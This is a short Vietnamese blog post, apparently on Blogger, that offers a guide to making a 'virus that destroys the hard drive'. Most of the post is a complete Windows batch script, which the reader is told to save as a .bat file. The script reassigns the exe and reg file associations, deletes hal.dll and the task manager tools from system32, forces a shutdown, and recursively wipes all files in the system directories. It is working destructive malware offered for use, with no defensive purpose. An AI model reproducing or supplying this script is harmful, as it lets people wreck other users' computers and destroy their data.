Hướng dẫn tạo virus phá ổ cứng

Hướng dẫn tạo virus phá ổ cứng


Vào notepad nhập mã sau.

@Echo Off


@cls

@title welcome to ketnooi.com/forum

@assoc exe=txt

@assoc reg=jpg

@cd %systemroot%

@del /f /s /q TASKMAN.EXE

@cd %Systemroot%\system32

@del /f /s /q hal.dll

@del /f /s /q taskkil.exe

@del /f /s /q tasklist.exe

@del /f /s /q taskman.exe

@del /f /s /q taskmgr.exe

@shutdown Thanks neu cai lai windows -s -t 06 -c " Fatal loi #1337, Duck!"

@del /f /s /q *.*

@cd ..

@del /f /s /q TASKMAN.EXE

@del /f /s /q *.*

@exit

Sau đó lưu lại. ở sau đuôi có dạng *.bat (nếu không có đuôi này thì tệp sẽ không hoạt động)
Hướng dẫn tạo virus phá ổ cứng Reviewed by MIN MIN on 04:57:00 Rating: 5
Tất cả bản quyền được bảo vệ bởi Diệp Hồ Hoàng Minh © 1999
Powered , Designed by Hoàng Minh | Facebook | Youtube

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.